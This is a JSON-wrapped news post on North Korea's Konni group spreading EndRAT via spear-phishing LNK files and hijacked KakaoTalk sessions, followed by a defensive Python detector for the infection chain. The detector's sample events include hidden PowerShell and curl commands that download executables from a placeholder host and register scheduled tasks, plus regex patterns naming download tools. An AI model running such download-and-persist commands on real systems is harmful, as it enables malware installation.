{"id":290,"date":"2026-03-17T10:48:46","date_gmt":"2026-03-17T10:48:46","guid":{"rendered":"https:\/\/thedigitalfortress.us\/?p=290"},"modified":"2026-03-17T10:48:46","modified_gmt":"2026-03-17T10:48:46","slug":"konni-deploys-endrat-through-phishing-uses-kakaotalk-to-propagate-malware","status":"publish","type":"post","link":"https:\/\/thedigitalfortress.us\/?p=290","title":{"rendered":"Konni Deploys EndRAT Through Phishing, Uses KakaoTalk to Propagate Malware"},"content":{"rendered":"<div>\n<p><span class=\"p-author\"><span class=\"author\">Ravie Lakshmanan<\/span> <span class=\"author\">Mar 17, 2026<\/span><\/span><span class=\"p-tags\">Threat Intelligence \/ Endpoint Security<\/span><\/p>\n<\/div>\n<div id=\"articlebody\">\n<p>North Korean threat actors have been observed sending spear-phishing emails to compromise targets and then using the victim&#8217;s KakaoTalk desktop application to distribute malicious payloads to selected contacts.<\/p>\n<p>The activity has been attributed by South Korean threat intelligence firm Genians to a hacking group referred to as <strong>Konni<\/strong>.<\/p>\n<p>\u00abInitial access was achieved through a spear-phishing email disguised as a notice appointing the recipient as a North Korean human rights lecturer,\u00bb the Genians Security Center (GSC) <a href=\"https:\/\/www.genians.co.kr\/en\/blog\/threat_intelligence\/kakaotalk\" rel=\"noopener\" target=\"_blank\">noted<\/a> in an analysis.<\/p>\n<p>\u00abAfter the 
spear-phishing attack succeeded, the victim executed a malicious LNK file, resulting in infection with remote access malware. The malware remained concealed and persistent on the victim&#8217;s endpoint for an extended period, stealing internal documents and sensitive information.\u00bb<\/p>\n<p>The threat actor is said to have retained access to the compromised host for an extended period, using it to siphon internal documents and to push the malware through the victim&#8217;s KakaoTalk application to selected contacts.<\/p>\n<p>The attack is notable for abusing the trust that contacts place in a compromised victim&#8217;s account in order to ensnare additional targets. This is not the first time Konni has used the messaging app as a distribution vector. In November 2025, the group was found abusing signed-in KakaoTalk chat app sessions to send malicious payloads to victims&#8217; contacts as a ZIP archive, while simultaneously initiating a remote wipe of their Android devices using stolen Google credentials.<\/p>\n<p>The latest campaign starts with a spear-phishing email that tricks recipients into opening a ZIP file attachment containing a Windows shortcut (LNK). 
Upon execution, the LNK file downloads a next-stage payload from an external server, establishes persistence through a scheduled task, and launches the malware, while opening a decoy PDF document so that the victim sees the content they expected and has no reason to suspect the shortcut.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEizSz_vG8_JCb7Kt-rAfMBoMX5tRaBCczP7Ug5ohhEshA7U674oefV8wl5g3KTqzCyycPzPobyGuadPpSeSle64xU3OrWjb9aBZDliD8hIkcVFByTonYke54eaHDiSE-3h8zwPfIXQ41kmmisCZP666m5uVRm6psjNb7L2gvM8ictycgc2KR4OWmK_qa9EO\/s1700-e365\/talk.png\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEizSz_vG8_JCb7Kt-rAfMBoMX5tRaBCczP7Ug5ohhEshA7U674oefV8wl5g3KTqzCyycPzPobyGuadPpSeSle64xU3OrWjb9aBZDliD8hIkcVFByTonYke54eaHDiSE-3h8zwPfIXQ41kmmisCZP666m5uVRm6psjNb7L2gvM8ictycgc2KR4OWmK_qa9EO\/s1700-e365\/talk.png\" alt=\"\" border=\"0\" data-original-height=\"1555\" data-original-width=\"2773\"\/><\/a><\/div>\n<p>Written in AutoIt, the downloaded malware is a remote access trojan (RAT) named EndRAT (aka EndClient RAT), which gives the operator remote control of the compromised host through capabilities such as file management, a remote shell, data transfer, and persistence.<\/p>\n<p>Further analysis of the infected host uncovered additional malicious artifacts, including AutoIt scripts corresponding to RftRAT and RemcosRAT, indicating that the adversary considered the victim valuable enough to deploy several RAT families so that access would survive the discovery and removal of any one of them.<\/p>\n<p>An important aspect of the attack is the threat actor&#8217;s abuse of the KakaoTalk application installed on the infected system to send ZIP files carrying the same malware to other individuals in the victim&#8217;s contact list. This turns existing victims into intermediaries for further attacks, and because the messages arrive from a known account, recipients are more inclined to open the attachment.<\/p>\n<p>\u00abThis campaign is assessed as a multi-stage attack operation that extends beyond simple spear-phishing, combining long-term persistence, information theft, and account-based redistribution,\u00bb Genians said. \u00abThe actor selected certain contacts from the victim\u2019s friend list and sent them additional malicious files. 
In doing so, the attacker used filenames disguised as materials introducing North Korea-related content to induce recipients to open the files.\u00bb<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Ravie Lakshmanan, Mar 17, 2026. Threat Intelligence \/ Endpoint Security. North Korean threat actors have been observed sending spear-phishing emails to compromise targets and then using the victim&#8217;s KakaoTalk desktop application to&hellip;<\/p>\n","protected":false},"author":1,"featured_media":291,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[297,707,708,706,42,390,709],"class_list":["post-290","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","tag-deploys","tag-endrat","tag-kakaotalk","tag-konni","tag-malware","tag-phishing","tag-propagate"],"_links":{"self":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/290","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=290"}],"version-history":[{"count":0,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/290\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/media\/291"}],"wp:attachment":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=290"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2
90"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=290"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
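The LNK infection chain the article describes (shortcut opened from Explorer, next-stage download, scheduled-task persistence, decoy PDF) leaves a sequence in endpoint telemetry that can be correlated. The Python below is an added example written for this page, not code from Genians, The Hacker News or the Konni operators: it runs a small detection over Sysmon-style process-creation events and raises an alert when a script host spawned by explorer.exe with a download command line is followed on the same host, within a configurable window, by a `schtasks /create`, recording a decoy document launch as supporting evidence. Every host name, path, URL and timestamp in `SAMPLE_EVENTS` is constructed for the example, and the download indicators go beyond the article's generic "downloads a next-stage payload" to cover several common Windows download primitives (PowerShell web cmdlets, curl, certutil, bitsadmin).

```python
"""Correlate process-creation telemetry for an LNK-driven infection chain:
a shortcut opened from Explorer spawns a script host that downloads a
next-stage payload, registers a scheduled task for persistence and opens a
decoy PDF.  Every host, path, URL and timestamp below is constructed for this
example; none is an indicator from the Genians report."""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Script hosts and LOLBins an LNK target commonly points at.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
# Download primitives seen in LNK command lines (wider than the article's
# generic "downloads a next-stage payload").
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|\bcurl\b|"
    r"certutil(\.exe)?\s.*-urlcache|bitsadmin|start-bitstransfer)", re.I)
SCHTASKS_RE = re.compile(r"schtasks(\.exe)?\s.*?/create", re.I)
DECOY_RE = re.compile(r"\.pdf\b", re.I)


@dataclass
class ProcEvent:
    """One Sysmon Event ID 1-style process-creation record."""
    time: datetime
    host: str
    image: str
    parent_image: str
    command_line: str


@dataclass
class Alert:
    host: str
    start: datetime
    evidence: list[str] = field(default_factory=list)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def detect_lnk_chain(events: list[ProcEvent], window_minutes: int = 10) -> list[Alert]:
    """Alert when a script host launched by explorer.exe with a download command
    line is followed on the same host, within the window, by schtasks /create.
    A decoy document launch inside the window is recorded as evidence only."""
    window = timedelta(minutes=window_minutes)
    by_host: dict[str, list[ProcEvent]] = {}
    for ev in sorted(events, key=lambda e: e.time):
        by_host.setdefault(ev.host, []).append(ev)

    alerts: list[Alert] = []
    for host, evs in by_host.items():
        for i, ev in enumerate(evs):
            if _base(ev.parent_image) != "explorer.exe" or _base(ev.image) not in SCRIPT_HOSTS:
                continue
            if not DOWNLOAD_RE.search(ev.command_line):
                continue
            alert = Alert(host, ev.time,
                          [f"stage 1 download via {_base(ev.image)}: {ev.command_line}"])
            persisted = False
            for later in evs[i + 1:]:
                if later.time - ev.time > window:
                    break  # events are time-sorted, so nothing later can qualify
                if SCHTASKS_RE.search(later.command_line):
                    persisted = True
                    alert.evidence.append(f"persistence: {later.command_line}")
                elif DECOY_RE.search(later.command_line):
                    alert.evidence.append(f"decoy document: {later.command_line}")
            if persisted:
                alerts.append(alert)
    return alerts


# Constructed sample telemetry (hypothetical hosts, paths and URLs).
_T0 = datetime(2026, 3, 10, 9, 0, 0)
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # WS-A: the full chain.
    ProcEvent(_T0, "WS-A", _PS, r"C:\Windows\explorer.exe",
              r"powershell -w hidden -c iwr http://example.invalid/n.dat -OutFile $env:TEMP\n.exe"),
    ProcEvent(_T0 + timedelta(seconds=4), "WS-A", r"C:\Windows\System32\schtasks.exe", _PS,
              r"schtasks /create /tn UpdateCheck /tr C:\Users\victim\AppData\Local\n.exe /sc minute /mo 30 /f"),
    ProcEvent(_T0 + timedelta(seconds=6), "WS-A", r"C:\Program Files\Adobe\Acrobat\AcroRd32.exe", _PS,
              r"AcroRd32.exe C:\Users\victim\AppData\Local\Temp\appointment.pdf"),
    # WS-B: an administrator creates a task with no preceding download stage (no alert).
    ProcEvent(_T0 + timedelta(minutes=1), "WS-B", r"C:\Windows\System32\schtasks.exe",
              r"C:\Windows\System32\cmd.exe", r"schtasks /create /tn Backup /tr C:\Tools\backup.exe /sc daily"),
    # WS-C: download stage from Explorer, but persistence lands outside the default window.
    ProcEvent(_T0, "WS-C", r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              r"cmd /c curl -o %TEMP%\a.exe http://example.invalid/a"),
    ProcEvent(_T0 + timedelta(hours=2), "WS-C", r"C:\Windows\System32\schtasks.exe",
              r"C:\Windows\System32\cmd.exe", r"schtasks /create /tn X /tr %TEMP%\a.exe /sc onlogon"),
]

if __name__ == "__main__":
    for a in detect_lnk_chain(SAMPLE_EVENTS):
        print(f"[{a.host}] chain starting {a.start:%H:%M:%S}")
        for line in a.evidence:
            print("   ", line)
```

With the default ten-minute window only WS-A fires; widening the window to three hours also catches WS-C, which is the trade-off a detection engineer tunes: a long window catches delayed persistence but raises the chance that an unrelated, legitimate `schtasks /create` is attributed to an earlier download. Feeding real Sysmon Event ID 1 data only requires mapping `UtcTime`, `Computer`, `Image`, `ParentImage` and `CommandLine` onto `ProcEvent`.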